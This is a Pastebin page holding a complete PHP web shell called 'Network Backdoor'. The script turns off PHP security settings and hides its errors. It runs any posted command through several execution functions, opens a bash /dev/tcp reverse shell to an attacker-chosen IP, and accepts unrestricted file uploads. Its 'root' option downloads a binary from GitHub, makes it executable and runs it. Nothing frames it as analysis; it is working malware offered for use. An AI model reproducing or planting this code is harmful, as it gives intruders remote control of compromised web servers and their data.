Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- //AUTHOR | AZZATSSINS
- @error_reporting(0);
- @ini_set('output_buffering',0);
- @ini_set('display_errors', 0);
- @ini_set('log_errors',0);
- echo ini_get("safe_mode");
- echo ini_get("open_basedir");
- ini_restore("safe_mode");
- ini_restore("open_basedir");
- $phi = fopen("php.ini","w");
- fwrite($phi,"safe_mode = Off
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF ");
- function exe($cmd){
- $xazx = "";
- $cmd = $cmd." 2>&1";
- if(is_callable('system')) {
- ob_start();
- @system($cmd);
- $xazx = ob_get_contents();
- ob_end_clean();
- if(!empty($xazx)) return $xazx;
- }
- if(is_callable('shell_exec')){
- $xazx = @shell_exec($cmd);
- if(!empty($xazx)) return $xazx;
- }
- if(is_callable('exec')) {
- @exec($cmd,$azxr);
- if(!empty($azxr)) foreach($azxr as $azxs) $xazx .= $azxs;
- if(!empty($xazx)) return $xazx;
- }
- if(is_callable('passthru')) {
- ob_start();
- @passthru($cmd);
- $xazx = ob_get_contents();
- ob_end_clean();
- if(!empty($xazx)) return $xazx;
- }
- if(is_callable('proc_open')) {
- $azxdescriptorspec = array(
- 0 => array("pipe", "r"),
- 1 => array("pipe", "w"),
- 2 => array("pipe", "w")
- );
- $azxproc = @proc_open($cmd, $azxdescriptorspec, $azxpipes, getcwd(), array());
- if (is_resource($azxproc)) {
- while ($azxsi = fgets($azxpipes[1])) {
- if(!empty($azxsi)) $xazx .= $azxsi;
- }
- while ($azxse = fgets($azxpipes[2])) {
- if(!empty($azxse)) $xazx .= $azxse;
- }
- }
- @proc_close($azxproc);
- if(!empty($xazx)) return $xazx;
- }
- if(is_callable('popen')){
- $azxf = @popen($cmd, 'r');
- if($azxf){
- while(!feof($azxf)){
- $xazx .= fread($azxf, 2096);
- }
- pclose($azxf);
- }
- if(!empty($xazx)) return $xazx;
- }
- return "";
- }
- echo'<title>Network Backdoor</title><body bgcolor=black><font color=red><center><b><a href="?">HOME</a></b><i><br>[ <a href="?file=upload">UPLOAD</a> ] [ <a href="?reverse=shell">REVERSHELL</a> ] [ <a href="?open=port">PORTS</a> ] [ <a href="?root=server">ROOT</a> ]</i></center></red><font color=green><br>';
- if($_GET['reverse'] == 'shell') {
- echo '<center><form method="post">IP :
- <input name="prx"> >> PORT : <input name="prt" value="110">
- <input type="submit" value="Connect" name="revershell">
- <br></form>';
- if($_POST['revershell']){
- exe("bash -i >& /dev/tcp/".$_POST['prx']."/".$_POST['prt']." 0>&1"); }
- }elseif($_GET['open'] == 'port'){
- echo "<pre>";
- print exe("netstat -an | grep -i listen 2>&1");
- echo "</pre>";
- }elseif($_GET['file'] == 'upload'){
- echo '<center><form method="post" enctype="multipart/form-data">
- <input type="file" name="x">
- <input type="submit" value="Upload" name="upload">
- <br></form>';
- if($_POST['upload']){
- copy( $_FILES ['x']['tmp_name'],$_FILES
- ['x']['name']);
- echo 'Success'; }
- }elseif($_GET['root'] == 'server'){
- exe("wget https://raw.githubusercontent.com/cyberserkers/root/master/azx && chmod +x azx && ./azx 123456");
- }else{
- echo '<form method="post"><input name="cmd"><br></form><pre>';
- print exe($_POST['cmd']);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement